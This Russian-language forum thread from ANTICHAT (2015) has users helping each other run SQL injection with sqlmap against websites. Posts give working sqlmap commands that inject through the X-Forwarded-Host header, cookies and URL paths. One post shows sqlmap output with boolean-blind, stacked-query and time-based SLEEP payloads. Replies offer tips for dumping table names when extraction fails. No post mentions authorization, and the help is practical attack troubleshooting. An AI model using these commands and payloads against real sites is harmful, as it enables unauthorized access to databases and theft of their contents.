HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 12.10.2015, 01:52
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

Подскажите перепробовал уже тьму вариантов, как можно нормально вытащить таблички и колонки (не перебирая по списку)

.SpoilerTarget" type="button">Spoiler: Открыть/закрыть

Код:
Code:
sqlmap.py -u "http://site.com/" --headers="X-Forwarded-Host:*" -D db_site --tables
[00:48:09] [INFO] resuming back-end DBMS 'mysql'
[00:48:09] [INFO] testing connection to the target URL
[00:48:09] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: X-Forwarded-Host #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: -3650') OR 8491=8491 AND ('uAYR'='uAYR

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: ');(SELECT * FROM (SELECT(SLEEP(5)))WjQQ)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ') AND (SELECT * FROM (SELECT(SLEEP(5)))hXGz) AND ('hNrS'='hNrS
---
back-end DBMS: MySQL >= 5.0.0
banner:    '5.6.19-log'
[00:48:20] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q]
Перебирая не находит то что нужно( бд по букве хоть но вывел

а так: [ERROR] unable to retrieve the table names for any database
 
Ответить с цитированием

  #12  
Старый 12.10.2015, 09:24
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

Цитата:
Сообщение от kacergei  
kacergei said:

Перебирая не находит то что нужно( бд по букве хоть но вывел
а так:
[ERROR] unable to retrieve the table names for any database
Попробуйте варианты

sqlmap.py -u "http://site.com/" --headers="X-Forwarded-Host:*" -D db_site --tables --technique=B --hex -v3 --is-dba

sqlmap.py -u "http://site.com/" --headers="X-Forwarded-Host:*" -D db_site --tables --technique=B --no-cast -v3

посмотреть причину ошибки по логу или возможно, нет прав
 
Ответить с цитированием

  #13  
Старый 12.10.2015, 21:22
ol1ver
Guest
Сообщений: n/a
Провел на форуме:
55143

Репутация: 0
По умолчанию

Господа хорошие, подскажите пожалуйста.

Пытаюсь крутить скулю через cookie (именно подсавлять в куке), но нахожу статьи только как авторизоваться. Ошибка что выдает говорит мне - идиот, я же в get ищу, а что искать?

И правильно ли я формирую запрос (http)?

Спасибо.

 
Ответить с цитированием

  #14  
Старый 13.10.2015, 08:13
private_static
Guest
Сообщений: n/a
Провел на форуме:
25535

Репутация: 22
По умолчанию

Цитата:
Сообщение от ol1ver  
ol1ver said:

Господа хорошие, подскажите пожалуйста.
Пытаюсь крутить скулю через cookie (именно подсавлять в куке), но нахожу статьи только как авторизоваться. Ошибка что выдает говорит мне - идиот, я же в get ищу, а что искать?
И правильно ли я формирую запрос (http)?
Спасибо.

попробуйте убрать -p "login" и в куках которые вы указали после значения логина добавить символ *

должно получиться чтото вроде --cookie="login=mylogin*"
 
Ответить с цитированием

  #15  
Старый 13.10.2015, 11:12
Waki
Guest
Сообщений: n/a
Провел на форуме:
19071

Репутация: 10
По умолчанию

Цитата:
Сообщение от ol1ver  
ol1ver said:

Господа хорошие, подскажите пожалуйста.
Пытаюсь крутить скулю через cookie (именно подсавлять в куке), но нахожу статьи только как авторизоваться. Ошибка что выдает говорит мне - идиот, я же в get ищу, а что искать?
И правильно ли я формирую запрос (http)?
Спасибо.

добавь --level=2

https://github.com/sqlmapproject/sqlmap/wiki/Usage

Цитата:
Сообщение от None  
Note that also the HTTP Cookie header is tested against SQL injection if the --level is set to
2
or above.
 
Ответить с цитированием

  #16  
Старый 13.10.2015, 16:29
WallHack
Guest
Сообщений: n/a
Провел на форуме:
61136

Репутация: 32
По умолчанию

Можно ли sqlmap сканнировать такой запрос:

sqlmap.py -u "site.ru/add/%27"

Или какой софт сканерует такой запрос ?
 
Ответить с цитированием

  #17  
Старый 13.10.2015, 17:43
xivi00
Guest
Сообщений: n/a
Провел на форуме:
11341

Репутация: 0
По умолчанию

WallHack присоединяюс тоже интересно
 
Ответить с цитированием

  #18  
Старый 13.10.2015, 17:52
private_static
Guest
Сообщений: n/a
Провел на форуме:
25535

Репутация: 22
По умолчанию

Цитата:
Сообщение от WallHack  
WallHack said:

Можно ли sqlmap сканнировать такой запрос:
sqlmap.py -u "site.ru/add/%27"
Или какой софт сканерует такой запрос ?
sqlmap.py -u "site.ru/add/*"
 
Ответить с цитированием

  #19  
Старый 13.10.2015, 18:05
gmiller
Guest
Сообщений: n/a
Провел на форуме:
2662

Репутация: 0
По умолчанию

Попробуй sqlmap.py -u "site.ru/add/*"
 
Ответить с цитированием

  #20  
Старый 13.10.2015, 18:44
strelok20094
Guest
Сообщений: n/a
Провел на форуме:
24770

Репутация: 2
По умолчанию

Цитата:
Сообщение от gmiller  
gmiller said:

Попробуй sqlmap.py -u "site.ru/add/*"
Цитата:
Сообщение от xivi00  
xivi00 said:

WallHack
присоединяюс тоже интересно
Цитата:
Сообщение от WallHack  
WallHack said:

Можно ли sqlmap сканнировать такой запрос:
sqlmap.py -u "site.ru/add/%27"
Или какой софт сканерует такой запрос ?
Что это за бред? Обычная sql льется без проблем, вместо %27'' ставишь * и льешь
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ